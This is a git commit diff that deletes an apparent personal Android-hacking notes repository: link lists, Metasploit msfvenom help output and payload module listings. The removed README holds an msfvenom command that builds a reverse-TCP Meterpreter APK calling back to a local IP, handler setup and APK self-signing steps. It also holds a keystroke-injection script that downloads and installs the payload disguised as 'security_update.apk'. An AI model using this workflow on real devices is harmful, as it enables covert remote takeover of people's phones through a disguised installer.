Compare commits
1 Commits
main
..
4c0f846ffb
| Author | SHA1 | Date | |
|---|---|---|---|
| 4c0f846ffb |
@@ -1,121 +0,0 @@
|
||||
Creative Commons Legal Code
|
||||
|
||||
CC0 1.0 Universal
|
||||
|
||||
CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
|
||||
LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
|
||||
ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
|
||||
INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
|
||||
REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
|
||||
PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
|
||||
THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
|
||||
HEREUNDER.
|
||||
|
||||
Statement of Purpose
|
||||
|
||||
The laws of most jurisdictions throughout the world automatically confer
|
||||
exclusive Copyright and Related Rights (defined below) upon the creator
|
||||
and subsequent owner(s) (each and all, an "owner") of an original work of
|
||||
authorship and/or a database (each, a "Work").
|
||||
|
||||
Certain owners wish to permanently relinquish those rights to a Work for
|
||||
the purpose of contributing to a commons of creative, cultural and
|
||||
scientific works ("Commons") that the public can reliably and without fear
|
||||
of later claims of infringement build upon, modify, incorporate in other
|
||||
works, reuse and redistribute as freely as possible in any form whatsoever
|
||||
and for any purposes, including without limitation commercial purposes.
|
||||
These owners may contribute to the Commons to promote the ideal of a free
|
||||
culture and the further production of creative, cultural and scientific
|
||||
works, or to gain reputation or greater distribution for their Work in
|
||||
part through the use and efforts of others.
|
||||
|
||||
For these and/or other purposes and motivations, and without any
|
||||
expectation of additional consideration or compensation, the person
|
||||
associating CC0 with a Work (the "Affirmer"), to the extent that he or she
|
||||
is an owner of Copyright and Related Rights in the Work, voluntarily
|
||||
elects to apply CC0 to the Work and publicly distribute the Work under its
|
||||
terms, with knowledge of his or her Copyright and Related Rights in the
|
||||
Work and the meaning and intended legal effect of CC0 on those rights.
|
||||
|
||||
1. Copyright and Related Rights. A Work made available under CC0 may be
|
||||
protected by copyright and related or neighboring rights ("Copyright and
|
||||
Related Rights"). Copyright and Related Rights include, but are not
|
||||
limited to, the following:
|
||||
|
||||
i. the right to reproduce, adapt, distribute, perform, display,
|
||||
communicate, and translate a Work;
|
||||
ii. moral rights retained by the original author(s) and/or performer(s);
|
||||
iii. publicity and privacy rights pertaining to a person's image or
|
||||
likeness depicted in a Work;
|
||||
iv. rights protecting against unfair competition in regards to a Work,
|
||||
subject to the limitations in paragraph 4(a), below;
|
||||
v. rights protecting the extraction, dissemination, use and reuse of data
|
||||
in a Work;
|
||||
vi. database rights (such as those arising under Directive 96/9/EC of the
|
||||
European Parliament and of the Council of 11 March 1996 on the legal
|
||||
protection of databases, and under any national implementation
|
||||
thereof, including any amended or successor version of such
|
||||
directive); and
|
||||
vii. other similar, equivalent or corresponding rights throughout the
|
||||
world based on applicable law or treaty, and any national
|
||||
implementations thereof.
|
||||
|
||||
2. Waiver. To the greatest extent permitted by, but not in contravention
|
||||
of, applicable law, Affirmer hereby overtly, fully, permanently,
|
||||
irrevocably and unconditionally waives, abandons, and surrenders all of
|
||||
Affirmer's Copyright and Related Rights and associated claims and causes
|
||||
of action, whether now known or unknown (including existing as well as
|
||||
future claims and causes of action), in the Work (i) in all territories
|
||||
worldwide, (ii) for the maximum duration provided by applicable law or
|
||||
treaty (including future time extensions), (iii) in any current or future
|
||||
medium and for any number of copies, and (iv) for any purpose whatsoever,
|
||||
including without limitation commercial, advertising or promotional
|
||||
purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
|
||||
member of the public at large and to the detriment of Affirmer's heirs and
|
||||
successors, fully intending that such Waiver shall not be subject to
|
||||
revocation, rescission, cancellation, termination, or any other legal or
|
||||
equitable action to disrupt the quiet enjoyment of the Work by the public
|
||||
as contemplated by Affirmer's express Statement of Purpose.
|
||||
|
||||
3. Public License Fallback. Should any part of the Waiver for any reason
|
||||
be judged legally invalid or ineffective under applicable law, then the
|
||||
Waiver shall be preserved to the maximum extent permitted taking into
|
||||
account Affirmer's express Statement of Purpose. In addition, to the
|
||||
extent the Waiver is so judged Affirmer hereby grants to each affected
|
||||
person a royalty-free, non transferable, non sublicensable, non exclusive,
|
||||
irrevocable and unconditional license to exercise Affirmer's Copyright and
|
||||
Related Rights in the Work (i) in all territories worldwide, (ii) for the
|
||||
maximum duration provided by applicable law or treaty (including future
|
||||
time extensions), (iii) in any current or future medium and for any number
|
||||
of copies, and (iv) for any purpose whatsoever, including without
|
||||
limitation commercial, advertising or promotional purposes (the
|
||||
"License"). The License shall be deemed effective as of the date CC0 was
|
||||
applied by Affirmer to the Work. Should any part of the License for any
|
||||
reason be judged legally invalid or ineffective under applicable law, such
|
||||
partial invalidity or ineffectiveness shall not invalidate the remainder
|
||||
of the License, and in such case Affirmer hereby affirms that he or she
|
||||
will not (i) exercise any of his or her remaining Copyright and Related
|
||||
Rights in the Work or (ii) assert any associated claims and causes of
|
||||
action with respect to the Work, in either case contrary to Affirmer's
|
||||
express Statement of Purpose.
|
||||
|
||||
4. Limitations and Disclaimers.
|
||||
|
||||
a. No trademark or patent rights held by Affirmer are waived, abandoned,
|
||||
surrendered, licensed or otherwise affected by this document.
|
||||
b. Affirmer offers the Work as-is and makes no representations or
|
||||
warranties of any kind concerning the Work, express, implied,
|
||||
statutory or otherwise, including without limitation warranties of
|
||||
title, merchantability, fitness for a particular purpose, non
|
||||
infringement, or the absence of latent or other defects, accuracy, or
|
||||
the present or absence of errors, whether or not discoverable, all to
|
||||
the greatest extent permissible under applicable law.
|
||||
c. Affirmer disclaims responsibility for clearing rights of other persons
|
||||
that may apply to the Work or any use thereof, including without
|
||||
limitation any person's Copyright and Related Rights in the Work.
|
||||
Further, Affirmer disclaims responsibility for obtaining any necessary
|
||||
consents, permissions or other rights required for any use of the
|
||||
Work.
|
||||
d. Affirmer understands and acknowledges that Creative Commons is not a
|
||||
party to this document and has no duty or obligation with respect to
|
||||
this CC0 or use of the Work.
|
||||
@@ -1,13 +0,0 @@
|
||||
* [ROBTRT421/apk.android.meterpreter.msfvenom](https://github.com/ROBTRT421/apk.android.meterpreter.msfvenom)
|
||||
* [AzeemIdrisi/PhoneSploit-Pro](https://github.com/AzeemIdrisi/PhoneSploit-Pro)
|
||||
* [apksigner](https://developer.android.com/tools/apksigner)
|
||||
* [App Signing](https://developer.android.com/studio/publish/app-signing#generate-key)
|
||||
* [Android Studio](https://developer.android.com/studio)
|
||||
* [msfvenom docs](https://www.offsec.com/metasploit-unleashed/msfvenom/)
|
||||
* [Meterpreter on Android Blog Post](https://medium.com/@S3Curiosity/exploring-the-power-of-msfvenom-for-android-meterpreter-in-ethical-hacking-8c6b54bc66ad)
|
||||
* [David Bombal's Rubber Ducky Meterpreter Payload](https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter)
|
||||
* [APK Install Rubber Ducky Payload](https://payloadhub.com/blogs/payloads/android-meterpreter-apk-install)
|
||||
* [o.mg cable meterpreter android (youtube)](https://www.youtube.com/watch?v=LRVlaNfthbg)
|
||||
* [o.mg android payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android)
|
||||
* [o.mg android meterpreter payloads](https://github.com/hak5/omg-payloads/tree/master/payloads/library/mobile/android/meterpreter)
|
||||
* [Tutorial on android meterpreter](https://samsclass.info/128/proj/M410a.htm)
|
||||
@@ -1,73 +1,2 @@
|
||||
# Android Hackfuckin
|
||||
## Meterpreter
|
||||
`msfvenom --payload android/meterpreter_reverse_tcp LHOST=10.0.0.51 LPORT=443 R > rawdoggin_output.apk`
|
||||
# android-hackhackin
|
||||
|
||||
## Msfconsole
|
||||
```
|
||||
sudo msfconsole -q
|
||||
msf > use exploit/multi/handler
|
||||
msf exploit(handler) > set payload android/meterpreter_reverse_tcp
|
||||
msf exploit(handler) > set lhost 10.0.0.51
|
||||
msf exploit(handler) > set lport 443
|
||||
msf exploit(handler) > exploit -j
|
||||
```
|
||||
|
||||
## Python Shitfuckery
|
||||
`python -m http.server 8787`
|
||||
|
||||
## Self Sign an apk
|
||||
### Install tools
|
||||
1. `sudo apt update`
|
||||
2. `sudo apt install apktool gnupg2 android-tools-adb default-jdk -y`
|
||||
### Create Signing Key
|
||||
* `keytool -genkey -v -keystore android.keystore -alias android -keyalg RSA -keysize 2048 -validity 10000`
|
||||
### Sign Apk
|
||||
* `jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore android.keystore my_app.apk android`
|
||||
|
||||
|
||||
## Some Shit
|
||||
```
|
||||
TAB
|
||||
DELAY 250
|
||||
GUI b
|
||||
DELAY 800
|
||||
CTRL SHIFT n
|
||||
DELAY 500
|
||||
CTRL l
|
||||
DELAY 1000
|
||||
STRING 192.168.4.4:9002/security_update.apk
|
||||
ENTER
|
||||
DELAY 7000
|
||||
TAB
|
||||
TAB
|
||||
DOWN
|
||||
RIGHT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
TAB
|
||||
ENTER
|
||||
TAB
|
||||
TAB
|
||||
RIGHT
|
||||
ENTER
|
||||
TAB
|
||||
ENTER
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
TAB
|
||||
ENTER
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
DELAY 350
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 350
|
||||
ENTER
|
||||
```
|
||||
-1922
File diff suppressed because it is too large
Load Diff
@@ -1,42 +0,0 @@
|
||||
|
||||
Framework Architectures [--arch <value>]
|
||||
========================================
|
||||
|
||||
Name
|
||||
----
|
||||
aarch64
|
||||
armbe
|
||||
armle
|
||||
cbea
|
||||
cbea64
|
||||
cmd
|
||||
dalvik
|
||||
firefox
|
||||
java
|
||||
loongarch64
|
||||
mips
|
||||
mips64
|
||||
mips64le
|
||||
mipsbe
|
||||
mipsle
|
||||
nodejs
|
||||
php
|
||||
ppc
|
||||
ppc64
|
||||
ppc64le
|
||||
ppce500v2
|
||||
python
|
||||
r
|
||||
riscv32be
|
||||
riscv32le
|
||||
riscv64be
|
||||
riscv64le
|
||||
ruby
|
||||
sparc
|
||||
sparc64
|
||||
tty
|
||||
x64
|
||||
x86
|
||||
x86_64
|
||||
zarch
|
||||
|
||||
@@ -1,11 +0,0 @@
|
||||
|
||||
Framework Encryption Formats [--encrypt <value>]
|
||||
================================================
|
||||
|
||||
Name
|
||||
----
|
||||
aes256
|
||||
base64
|
||||
rc4
|
||||
xor
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
|
||||
Framework Executable Formats [--format <value>]
|
||||
===============================================
|
||||
|
||||
Name
|
||||
----
|
||||
asp
|
||||
aspx
|
||||
aspx-exe
|
||||
axis2
|
||||
dll
|
||||
ducky-script-psh
|
||||
elf
|
||||
elf-so
|
||||
exe
|
||||
exe-only
|
||||
exe-service
|
||||
exe-small
|
||||
hta-psh
|
||||
jar
|
||||
jsp
|
||||
loop-vbs
|
||||
macho
|
||||
msi
|
||||
msi-nouac
|
||||
osx-app
|
||||
psh
|
||||
psh-cmd
|
||||
psh-net
|
||||
psh-reflection
|
||||
python-reflection
|
||||
vba
|
||||
vba-exe
|
||||
vba-psh
|
||||
vbs
|
||||
war
|
||||
|
||||
Framework Transform Formats [--format <value>]
|
||||
==============================================
|
||||
|
||||
Name
|
||||
----
|
||||
base32
|
||||
base64
|
||||
bash
|
||||
c
|
||||
csharp
|
||||
dw
|
||||
dword
|
||||
go
|
||||
golang
|
||||
hex
|
||||
java
|
||||
js_be
|
||||
js_le
|
||||
masm
|
||||
nim
|
||||
nimlang
|
||||
num
|
||||
octal
|
||||
perl
|
||||
pl
|
||||
powershell
|
||||
ps1
|
||||
py
|
||||
python
|
||||
raw
|
||||
rb
|
||||
ruby
|
||||
rust
|
||||
rustlang
|
||||
sh
|
||||
vbapplication
|
||||
vbscript
|
||||
zig
|
||||
|
||||
@@ -1,32 +0,0 @@
|
||||
MsfVenom - a Metasploit standalone payload generator.
|
||||
Also a replacement for msfpayload and msfencode.
|
||||
Usage: /usr/bin/msfvenom [options] <var=val>
|
||||
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
|
||||
|
||||
Options:
|
||||
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
|
||||
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
|
||||
--list-options List --payload <value>'s standard, advanced and evasion options
|
||||
-f, --format <format> Output format (use --list formats to list)
|
||||
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
|
||||
--service-name <value> The service name to use when generating a service binary
|
||||
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
|
||||
--smallest Generate the smallest possible payload using all available encoders
|
||||
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
|
||||
--encrypt-key <value> A key to be used for --encrypt
|
||||
--encrypt-iv <value> An initialization vector for --encrypt
|
||||
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
|
||||
--platform <platform> The platform for --payload (use --list platforms to list)
|
||||
-o, --out <path> Save the payload to a file
|
||||
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
|
||||
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
|
||||
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
|
||||
-s, --space <length> The maximum size of the resulting payload
|
||||
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
|
||||
-i, --iterations <count> The number of times to encode the payload
|
||||
-c, --add-code <path> Specify an additional win32 shellcode file to include
|
||||
-x, --template <path> Specify a custom executable file to use as a template
|
||||
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
|
||||
-v, --var-name <value> Specify a custom variable name to use for certain output formats
|
||||
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
|
||||
-h, --help Show this message
|
||||
@@ -1,20 +0,0 @@
|
||||
|
||||
Framework NOPs (13 total)
|
||||
=========================
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
aarch64/simple Simple NOP generator
|
||||
armle/simple Simple NOP generator
|
||||
cmd/generic Generates harmless padding for command payloads.
|
||||
mipsbe/better Better NOP generator
|
||||
php/generic Generates harmless padding for PHP scripts
|
||||
ppc/simple Simple NOP generator
|
||||
riscv32le/simple Simple NOP generator
|
||||
riscv64le/simple Simple NOP generator
|
||||
sparc/random SPARC NOP generator
|
||||
tty/generic Generates harmless padding for TTY input
|
||||
x64/simple An x64 single/multi byte NOP instruction generator.
|
||||
x86/opty2 Opty2 multi-byte NOP generator
|
||||
x86/single_byte Single-byte NOP generator
|
||||
|
||||
@@ -1,32 +0,0 @@
|
||||
|
||||
Name: AIX Command Shell, Bind TCP Inline
|
||||
Module: payload/aix/ppc/shell_bind_tcp
|
||||
Platform: AIX
|
||||
Arch: ppc
|
||||
Needs Admin: No
|
||||
Total size: 264
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AIX 6.1.4 yes IBM AIX Version
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,31 +0,0 @@
|
||||
|
||||
Name: AIX Command Shell, Find Port Inline
|
||||
Module: payload/aix/ppc/shell_find_port
|
||||
Platform: AIX
|
||||
Arch: ppc
|
||||
Needs Admin: No
|
||||
Total size: 220
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AIX 6.1.4 yes IBM AIX Version
|
||||
CPORT 64342 no The local client port
|
||||
|
||||
Description:
|
||||
Spawn a shell on an established connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
|
||||
Name: AIX execve Shell for inetd
|
||||
Module: payload/aix/ppc/shell_interact
|
||||
Platform: AIX
|
||||
Arch: ppc
|
||||
Needs Admin: No
|
||||
Total size: 56
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
jduck <jduck@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AIX 6.1.4 yes IBM AIX Version
|
||||
|
||||
Description:
|
||||
Simply execve /bin/sh (for inetd programs)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,39 +0,0 @@
|
||||
|
||||
Name: AIX Command Shell, Reverse TCP Inline
|
||||
Module: payload/aix/ppc/shell_reverse_tcp
|
||||
Platform: AIX
|
||||
Arch: ppc
|
||||
Needs Admin: No
|
||||
Total size: 204
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Ramon de C Valle <rcvalle@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AIX 6.1.4 yes IBM AIX Version
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,74 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter, Android Reverse HTTP Stager
|
||||
Module: payload/android/meterpreter/reverse_http
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: N
|
||||
Evasion options for payload/android/meterpreter/reverse_http:
|
||||
=========================
|
||||
|
||||
t.com>
|
||||
OJ Reeves
|
||||
anwarelmakrahy
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run a meterpreter server in Android.
|
||||
|
||||
Tunnel communication over HTTP
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
||||
HttpReferer no An optional value to use for the Referer HTTP header
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter, Android Reverse HTTPS Stager
|
||||
Module: payload/android/meterpreter/reverse_https
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: N
|
||||
Evasion options for payload/android/meterpreter/reverse_https:
|
||||
=========================
|
||||
|
||||
.com>
|
||||
OJ Reeves
|
||||
anwarelmakrahy
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run a meterpreter server in Android.
|
||||
|
||||
Tunnel communication over HTTPS
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
||||
HttpReferer no An optional value to use for the Referer HTTP header
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,66 +0,0 @@
|
||||
|
||||
Name: Android Meterpreter, Android Reverse TCP Stager
|
||||
Module: payload/android/meterpreter/reverse_tcp
|
||||
Platform: Android
|
||||
Arch: dalvik
|
||||
Needs Admin: No
|
||||
Total size: 10217
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
mihi
|
||||
egypt <egypt@metasploit.com>
|
||||
OJ Reeves
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Run a meterpreter server in Android.
|
||||
|
||||
Connect back stager
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
||||
